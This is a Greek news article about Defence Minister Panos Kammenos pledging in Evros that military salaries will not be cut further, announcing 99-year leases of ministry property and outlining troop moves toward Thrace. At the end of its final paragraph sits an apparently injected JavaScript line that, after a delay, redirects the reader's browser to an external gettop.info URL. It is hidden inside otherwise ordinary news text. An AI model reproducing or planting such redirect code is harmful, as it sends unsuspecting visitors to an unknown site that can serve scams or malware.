Καμμένος: Δεν θα επιτρέψουμε περαιτέρω μείωση στα εισοδήματα των ένστολων

0
11

 

Από τον Έβρο όπου περιόδευε σήμερα ο υπουργός Εθνικής Άμυνας Πάνος Καμμένος διαβεβαίωσε ότι δεν θα επιτρέψει περαιτέρω μείωση στο εισόδημα των στελεχών των Ενόπλων Δυνάμεων και δεσμεύτηκε για συνέχιση των παρεμβάσεων για την εφαρμογή της απόφασης του Συμβουλίου της Επικρατείας σε σχέση με τη μισθολογική τους δαπάνη.

Μιλώντας στην τελετή εγκαινίων συγκροτήματος 12 διαμερισμάτων ΕΠΟΠ στην Ορεστιάδα, ο κ. Καμμένος επανέλαβε ότι η προάσπιση του Έβρου είναι υψίστης σημασίας λόγω της καίριας και σημαντικής αξίας που έχει για την εδαφική ακεραιότητα και την ανεξαρτησία της χώρας.

Ο υπουργός Εθνικής Άμυνας αναφέρθηκε και στην προσπάθεια που έχει αρχίσει το υπουργείο για την καταγραφή και αξιοποίηση των περιουσιακών του στοιχείων. «Μία περιουσία της τάξεως των 34 δισεκατομμυρίων ευρώ που βρισκόταν μέχρι σήμερα ανεκμετάλλευτη», ενώ ανακοίνωσε ότι εντός του επόμενου μήνα θα πραγματοποιηθεί ο πρώτος διαγωνισμός για την ενοικίαση για 99 χρόνια περιουσιακών στοιχείων του υπουργείου, τα έσοδα από τον οποίο θα διατίθενται προς όφελος του προσωπικού.

Τόνισε πως στόχος του υπουργείου είναι η μετακίνηση ακόμη περισσότερων δυνάμεων στην περιοχή της Θράκης και ιδιαίτερα στην περιοχή του Έβρου. «Στο πλαίσιο αυτό γίνεται η αναδιαμόρφωση όλου του σχεδιασμού των Ενόπλων Δυνάμεων, με μετακίνηση από περιοχές της νοτίου και κεντρικής Ελλάδας προς τα βόρεια σύνορά μας και ιδιαίτερα προς την περιοχή της Θράκης, μονάδων που θα βοηθήσουν στην οικονομική ανάπτυξη των περιοχών». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here